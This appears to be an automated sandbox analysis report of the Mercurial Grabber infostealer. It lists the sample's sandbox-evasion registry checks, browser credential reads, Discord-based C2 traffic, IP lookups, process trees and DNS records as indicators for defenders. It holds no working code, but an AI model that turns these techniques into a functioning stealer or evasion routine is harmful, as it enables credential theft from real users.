mercurialgrabber | hxxps://github[.]com/NightfallGT/Mercurial-Grabber

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions	Solara.exe

Looks for VMWare Tools registry key 2 TTPs 1 IoCs

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\VMWare, Inc.\VMWare Tools	Solara.exe

Checks BIOS information in registry 2 TTPs 1 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Solara.exe

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 3 IoCs

pid	Process
3204	7zFM.exe
4284	Mercurial.exe
1324	Solara.exe

Loads dropped DLL 2 IoCs

pid	Process
3432	Process not Found
3204	7zFM.exe

Obfuscated with Agile.Net obfuscator 11 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

resource	yara_rule
behavioral1/memory/4284-231-0x00000000051D0000-0x00000000051EC000-memory.dmp	agile_net
behavioral1/memory/4284-232-0x00000000051F0000-0x0000000005210000-memory.dmp	agile_net
behavioral1/memory/4284-233-0x0000000005210000-0x0000000005230000-memory.dmp	agile_net
behavioral1/memory/4284-234-0x0000000005250000-0x0000000005260000-memory.dmp	agile_net
behavioral1/memory/4284-235-0x0000000005260000-0x0000000005274000-memory.dmp	agile_net
behavioral1/memory/4284-236-0x0000000005270000-0x00000000052DE000-memory.dmp	agile_net
behavioral1/memory/4284-237-0x00000000052F0000-0x000000000530E000-memory.dmp	agile_net
behavioral1/memory/4284-240-0x0000000005390000-0x000000000539E000-memory.dmp	agile_net
behavioral1/memory/4284-239-0x0000000005370000-0x000000000537E000-memory.dmp	agile_net
behavioral1/memory/4284-238-0x0000000005330000-0x0000000005366000-memory.dmp	agile_net
behavioral1/memory/4284-241-0x0000000005C00000-0x0000000005D4A000-memory.dmp	agile_net

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 17 IoCs

Web Service

T1102

flow	ioc
207	discord.com
223	discord.com
258	discord.com
270	discord.com
296	discord.com
160	discord.com
206	discord.com
268	discord.com
269	discord.com
280	discord.com
290	discord.com
295	discord.com
259	discord.com
281	discord.com
159	discord.com
161	discord.com
221	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
264	ip4.seeip.org
266	ip-api.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	Solara.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	Solara.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\127.0.2651.86\readme.txt	msedge.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ca.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\et.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\nb.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sr-spc.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\uk.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\7z.sfx	7z2408-x64.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\127.0.2651.86\Mercurial.exe	msedge.exe
File opened for modification	C:\Program Files\7-Zip\Lang\be.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\cy.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\gl.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\pa-in.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\pt.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\si.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ta.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ug.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Uninstall.exe	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fa.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fy.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\7z.exe	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ka.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\eu.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ext.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\gu.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\it.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ne.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ru.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\zh-tw.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mn.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\License.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mng2.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\bn.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\is.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sl.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ar.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\el.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\en.ttt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\7-zip.chm	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\uz-cyrl.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ast.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\az.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\an.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mng.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sa.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sq.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\tg.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\bg.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\br.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fi.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\hy.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sk.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\kk.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mk.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ps.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sw.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\th.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\yo.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\7z.dll	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\cs.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\eo.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fr.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\7-zip32.dll	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\kaa.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\lv.txt	7z2408-x64.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7z2408-x64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Mercurial.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe

Checks SCSI registry key(s) 3 TTPs 1 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S	Solara.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	Solara.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Solara.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemProductName	Solara.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Logical Unit Id 0	Solara.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosInformation	Solara.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer	Solara.exe

Modifies registry class 22 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip	7z2408-x64.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}	7z2408-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}	7z2408-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip	7z2408-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2408-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip	7z2408-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip	7z2408-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment"	7z2408-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32	7z2408-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2408-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2408-x64.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2170637797-568393320-3232933035-1000\{16673451-606A-4038-AB65-5BF419A561A6}	msedge.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension"	7z2408-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32	7z2408-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip32.dll"	7z2408-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension"	7z2408-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment"	7z2408-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll"	7z2408-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2408-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip	7z2408-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2408-x64.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
4284	Mercurial.exe
4284	Mercurial.exe
4284	Mercurial.exe
4284	Mercurial.exe
4284	Mercurial.exe
4284	Mercurial.exe
4284	Mercurial.exe
4284	Mercurial.exe
4284	Mercurial.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3204	7zFM.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeRestorePrivilege	3204	7zFM.exe
Token: 35	3204	7zFM.exe
Token: SeSecurityPrivilege	3204	7zFM.exe
Token: SeDebugPrivilege	4284	Mercurial.exe
Token: 33	2508	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2508	AUDIODG.EXE
Token: SeDebugPrivilege	1324	Solara.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
3204	7zFM.exe
3204	7zFM.exe
3204	7zFM.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
4476	7z2408-x64.exe
892	OpenWith.exe
892	OpenWith.exe
892	OpenWith.exe
892	OpenWith.exe
892	OpenWith.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 4284 wrote to memory of 2960	4284	Mercurial.exe	130
PID 4284 wrote to memory of 2960	4284	Mercurial.exe	130
PID 4284 wrote to memory of 2960	4284	Mercurial.exe	130
PID 2960 wrote to memory of 4556	2960	csc.exe	132
PID 2960 wrote to memory of 4556	2960	csc.exe	132
PID 2960 wrote to memory of 4556	2960	csc.exe	132

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/NightfallGT/Mercurial-Grabber
1⤵
PID:5032

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=1284,i,8548254608087149642,10333768245962368401,262144 --variations-seed-version --mojo-platform-channel-handle=3512 /prefetch:1
1⤵
PID:4816

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --field-trial-handle=3820,i,8548254608087149642,10333768245962368401,262144 --variations-seed-version --mojo-platform-channel-handle=4788 /prefetch:1
1⤵
PID:980

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=5456,i,8548254608087149642,10333768245962368401,262144 --variations-seed-version --mojo-platform-channel-handle=5420 /prefetch:8
1⤵
PID:4460

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --field-trial-handle=5424,i,8548254608087149642,10333768245962368401,262144 --variations-seed-version --mojo-platform-channel-handle=5516 /prefetch:8
1⤵
PID:3940

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --field-trial-handle=5948,i,8548254608087149642,10333768245962368401,262144 --variations-seed-version --mojo-platform-channel-handle=5968 /prefetch:8
1⤵
PID:764

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --field-trial-handle=6008,i,8548254608087149642,10333768245962368401,262144 --variations-seed-version --mojo-platform-channel-handle=6372 /prefetch:8
1⤵
PID:4728

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --field-trial-handle=6324,i,8548254608087149642,10333768245962368401,262144 --variations-seed-version --mojo-platform-channel-handle=6076 /prefetch:1
1⤵
PID:1492

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --field-trial-handle=6264,i,8548254608087149642,10333768245962368401,262144 --variations-seed-version --mojo-platform-channel-handle=6572 /prefetch:8
1⤵
- Drops file in Program Files directory
PID:4928

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --field-trial-handle=6996,i,8548254608087149642,10333768245962368401,262144 --variations-seed-version --mojo-platform-channel-handle=6964 /prefetch:8
1⤵
PID:4228

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --field-trial-handle=4820,i,8548254608087149642,10333768245962368401,262144 --variations-seed-version --mojo-platform-channel-handle=4988 /prefetch:1
1⤵
PID:5032

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --field-trial-handle=7116,i,8548254608087149642,10333768245962368401,262144 --variations-seed-version --mojo-platform-channel-handle=7124 /prefetch:1
1⤵
PID:4568

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --field-trial-handle=6952,i,8548254608087149642,10333768245962368401,262144 --variations-seed-version --mojo-platform-channel-handle=7192 /prefetch:8
1⤵
PID:1600

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --field-trial-handle=7076,i,8548254608087149642,10333768245962368401,262144 --variations-seed-version --mojo-platform-channel-handle=7216 /prefetch:8
1⤵
- Modifies registry class
PID:3840

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --field-trial-handle=7268,i,8548254608087149642,10333768245962368401,262144 --variations-seed-version --mojo-platform-channel-handle=7280 /prefetch:1
1⤵
PID:3136

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --field-trial-handle=7004,i,8548254608087149642,10333768245962368401,262144 --variations-seed-version --mojo-platform-channel-handle=7028 /prefetch:1
1⤵
PID:2116

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --field-trial-handle=6568,i,8548254608087149642,10333768245962368401,262144 --variations-seed-version --mojo-platform-channel-handle=6584 /prefetch:1
1⤵
PID:3604

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --field-trial-handle=7232,i,8548254608087149642,10333768245962368401,262144 --variations-seed-version --mojo-platform-channel-handle=7608 /prefetch:1
1⤵
PID:1192

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --field-trial-handle=7768,i,8548254608087149642,10333768245962368401,262144 --variations-seed-version --mojo-platform-channel-handle=7780 /prefetch:8
1⤵
PID:3372

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --field-trial-handle=7848,i,8548254608087149642,10333768245962368401,262144 --variations-seed-version --mojo-platform-channel-handle=7828 /prefetch:8
1⤵
PID:2152

C:\Users\Admin\Downloads\7z2408-x64.exe
"C:\Users\Admin\Downloads\7z2408-x64.exe"
1⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4476

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:892

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4328

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --field-trial-handle=6888,i,8548254608087149642,10333768245962368401,262144 --variations-seed-version --mojo-platform-channel-handle=6056 /prefetch:8
1⤵
PID:4688

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\Mercurial.Grabber.v1.03.rar"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3204

C:\Users\Admin\Desktop\Mercurial.exe
"C:\Users\Admin\Desktop\Mercurial.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4284
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\roqe3hei\roqe3hei.cmdline"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2960
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES25F8.tmp" "c:\Users\Admin\Desktop\CSCB144162DAC5F435C94EB569F9FEE59A.TMP"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4556

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --field-trial-handle=5612,i,8548254608087149642,10333768245962368401,262144 --variations-seed-version --mojo-platform-channel-handle=5780 /prefetch:1
1⤵
PID:3708

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x304 0x498
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2508

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --field-trial-handle=3588,i,8548254608087149642,10333768245962368401,262144 --variations-seed-version --mojo-platform-channel-handle=7108 /prefetch:1
1⤵
PID:4468

C:\Users\Admin\Desktop\Solara.exe
"C:\Users\Admin\Desktop\Solara.exe"
1⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Executes dropped EXE
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:1324

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --field-trial-handle=5600,i,8548254608087149642,10333768245962368401,262144 --variations-seed-version --mojo-platform-channel-handle=5760 /prefetch:8
1⤵
PID:3868

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=5724,i,8548254608087149642,10333768245962368401,262144 --variations-seed-version --mojo-platform-channel-handle=6256 /prefetch:8
1⤵
PID:3100

Network

DNS

github.com

Remote address:

8.8.8.8:53

Request

github.com

IN A

Response

github.com

IN A

20.26.156.215
DNS

github.com

Remote address:

8.8.8.8:53

Request

github.com

IN Unknown

Response
DNS

github.com

Remote address:

8.8.8.8:53

Request

github.com

IN A

Response

github.com

IN A

20.26.156.215
DNS

business.bing.com

Remote address:

8.8.8.8:53

Request

business.bing.com

IN A

Response

business.bing.com

IN CNAME

business-bing-com.b-0005.b-msedge.net

business-bing-com.b-0005.b-msedge.net

IN CNAME

b-0005.b-msedge.net

b-0005.b-msedge.net

IN A

13.107.6.158
DNS

business.bing.com

